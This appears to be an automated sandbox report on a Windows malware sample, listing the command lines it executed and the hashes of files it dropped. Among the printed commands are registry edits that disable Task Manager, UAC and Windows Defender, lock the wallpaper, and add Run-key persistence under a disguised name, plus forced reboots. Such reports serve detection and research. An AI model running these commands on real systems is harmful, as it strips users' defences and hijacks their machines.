C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\covid.bat" "
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\wscript.exe
"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\BEBC.tmp\BEBD.tmp\BEBE.vbs //Nologo
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\note.bmp /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe
clwcp c:\covid20\bg.bmp
C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe
flasher 5 c:\covid20\covid.bmp
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "death666" /t REG_SZ /F /D "C:\HostFile.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\corona.vbs"
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 00
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C498.tmp\HorrorBob2.bat" "
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3a06855 /state1:0x41c64e6d
C:\Windows\SysWOW64\cscript.exe
cscript prompt.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f
C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"
C:\Windows\SysWOW64\net.exe
net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 00
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Network
Files
memory/4780-0-0x0000000000400000-0x0000000001A7B000-memory.dmp
memory/2116-1-0x0000000000400000-0x0000000000A12000-memory.dmp
memory/5032-2-0x0000000000400000-0x000000000132F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\C18B.tmp\BobuxGen.cmd
| MD5 | 47f426fb3883f2da30e9aa2a7d693fa5 |
| SHA1 | 50d843d68817717f21ba96d26a571ad996a5e35a |
| SHA256 | b1c9a35d14eec5c522fd82babfae348dc244996f75d36543347208acf6f0f85b |
| SHA512 | 2e588a0d6e2fb86e447d165d28b0600a9fe6fd670b391f70a918c333259a5b171a18837c73927c3a6de3240557b1860fe7bc616801c3dc16b9d6373c362ffacb |
C:\Users\Admin\AppData\Local\Temp\BEBC.tmp\BEBD.tmp\BEBE.vbs
| MD5 | a0679dce64fcf875f4208b823d4b85c0 |
| SHA1 | 85abe3673db82bfe5b2c207dc98648e32afffea0 |
| SHA256 | 85a07013575a6a890c7b1d26adaa52f17616c4cca673617aa1fc0992aa29dda1 |
| SHA512 | 1e2740a09acc5b0d679acfd740feb3556638f1b6029078668bbb7e067b356fcecf23c5b317b02888822cc180c0eb5cb7e2caf63d92a74515ebc5a1031d80f3a6 |
C:\Users\Admin\AppData\Local\Temp\C18B.tmp\HostFile.exe
| MD5 | c875f76e521f520404401122bd82630a |
| SHA1 | 3b1c78420a55b9a768b28168753c4e22982421ef |
| SHA256 | a58caeb57da3061620dccfc374b2fba87c3061d981782d47a5dcc287e1db1d11 |
| SHA512 | b712f09c1b5fcee804da12c45e2404b265b9a18e40b9ede4f6336e3a42086e1b02bfe9ba1b5ec487251e6d96b15f5ed4a179690a8f4ae2cc36454a15f136b54b |
C:\Users\Admin\AppData\Local\Temp\C18B.tmp\note.bmp
| MD5 | ed30c76a614ec8db5e4ac22e2929f53d |
| SHA1 | 27ab24ede0ec37cedd2cbf4d9f7135375f031fa4 |
| SHA256 | 96df16e4bef56e83f8f1106834aa23caf05972549d1c24c1f7def12e6ef4d21a |
| SHA512 | ec941a162de8fb1b32a71256ba11104775ff67424a6098e61f8d362ecc6547458e1cc4343dacd2b8df359da487d66832c2813e951d733b29803402f8206dfa8b |
C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\covid.bat
| MD5 | b08e02e536917f897acb2d21f42f0a97 |
| SHA1 | a078f1addfd3eeb0f0cb5fd206ff78e9dc0f3e45 |
| SHA256 | 2c68caeada2c251c5fc12694b7288a5790114ced4142867179e75d313efaa50c |
| SHA512 | 1d1901c3c676bb6d99a39d1a0bab1a6ee378090390bb5e7fe66cf754b8dd772ac0b79ba1215fa758445db1deac200afcc5e1e1e32b2562df946c82b530ca95ab |
C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\bg.bmp
| MD5 | cb065726febf9c1a581f3008e678f524 |
| SHA1 | f9a0058a57213cf7ce72eddf0616a938c8f4f4b1 |
| SHA256 | d8f864128f2a79e2ff8179255ebfd06619325fec86103722b6418c3cbb41823f |
| SHA512 | b54a81cff5951b34478e777bc27cc4fd4a292b548f38162602c01e2594848e40fcfea5becfd789153c9a4fa75c354834a3a37cf3032c9857e9246bf850d24880 |
C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\covid.bmp
| MD5 | 738bbd119d8877f8342e1ff00fe60dff |
| SHA1 | fc11d85e3c5b46bd877e06985fec1a601ce396ed |
| SHA256 | 548c9e22a04650efec06a0414d205d24600e08e0fac1beed7e8b4c03730962bb |
| SHA512 | f7a12c9a1403c9a1953387c5871d6e7865ba80c405f37c51f5c3e093bab9235b8a8ba62ad8b27f2079407e9672d47ac365c9cb08033ef349bd8c9906a30fefad |
C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe
| MD5 | e62ee6f1efc85cb36d62ab779db6e4ec |
| SHA1 | da07ec94cf2cb2b430e15bd0c5084996a47ee649 |
| SHA256 | 13b4ec59785a1b367efb691a3d5c86eb5aaf1ca0062521c4782e1baac6633f8a |
| SHA512 | 8142086979ec1ca9675418e94326a40078400aff8587fc613e17164e034badd828e9615589e6cb8b9339da7cdc9bcb8c48e0890c5f288068f4b86ff659670a69 |
C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe
| MD5 | 9254ca1da9ff8ad492ca5fa06ca181c6 |
| SHA1 | 70fa62e6232eae52467d29cf1c1dacb8a7aeab90 |
| SHA256 | 30676ad5dc94c3fec3d77d87439b2bf0a1aaa7f01900b68002a06f11caee9ce6 |
| SHA512 | a84fbbdea4e743f3e41878b9cf6db219778f1479aa478100718af9fc8d7620fc7a3295507e11df39c7863cb896f946514e50368db480796b6603c8de5580685a |
C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\corona.vbs
| MD5 | e61624dced063c4ba5352bf487f12410 |
| SHA1 | 40bd08928900cd97f444ffaa78d93dcaf913b274 |
| SHA256 | 82ac48c4f7edbab182aa0a8c320d5616ccdd2f0e83dc733b91e45521f85462a3 |
| SHA512 | 2a27db12d2af35e7b51a307eb8860800075867922d3d63a69da608c96bec045f3c64ac757674d2a40d7f4d9e55179fc2bddc17691919e18e109a5d4669c607ac |
memory/752-78-0x0000000000400000-0x0000000000484000-memory.dmp
memory/4088-77-0x0000000000400000-0x00000000004A4000-memory.dmp
memory/4780-79-0x0000000000400000-0x0000000001A7B000-memory.dmp
memory/2116-81-0x0000000000400000-0x0000000000A12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\C498.tmp\HorrorBob2.bat
| MD5 | b11c0b55dba339bbe3169584fa0eedd8 |
| SHA1 | 8c201122fd73cea5d8d2aa2aa6f7c17d99b521d9 |
| SHA256 | f73a510ebd7495f8432b489009aeed5ae7c945ccf68ec3baf88605aeefb2d073 |
| SHA512 | 8424ce9a6af67721c6df13edbfbe9e48ad1eb014e19c6952afd4158c16762cf65092e6ef459a98680673e30c86da9ba9aaf2aca309426b9237bfcf893ed40006 |
memory/5032-76-0x0000000000400000-0x000000000132F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\C498.tmp\blood.bmp
| MD5 | 040d29b801e3488f7aee3f9708128eea |
| SHA1 | 433591a971325f7529cbb7a1d16645ff65ee10c7 |
| SHA256 | fe28980c6e213619a95e5991de2062a0187fc3054418e670e1c67d3c5b6b01de |
| SHA512 | 79c64fce68a58fea469bb71dd1e10a3a2c1d4dc024635be2b8e29793bab8c34ba7afd402d47cce7826279512c7906f31fed9fe986024bc03a36dc094f7629826 |
C:\Users\Admin\AppData\Local\Temp\C498.tmp\Service64.exe
| MD5 | b53852cb556ec28efc39b986caddb791 |
| SHA1 | 5ce0819a7b1703f67272fa0f21546d0a8b2d7b0a |
| SHA256 | ae8cd9b5396770fa3c77140246365c3c501ece718b52fd6b7faed85c26b25d2a |
| SHA512 | 7da30187b939c91d045dbe9cfe8daa209d539ca865d759bde4be1c8f4f96fac5f5747ec1be1937eb00034bf531391788586c5d6c3ee93c94d88201e3a1d52599 |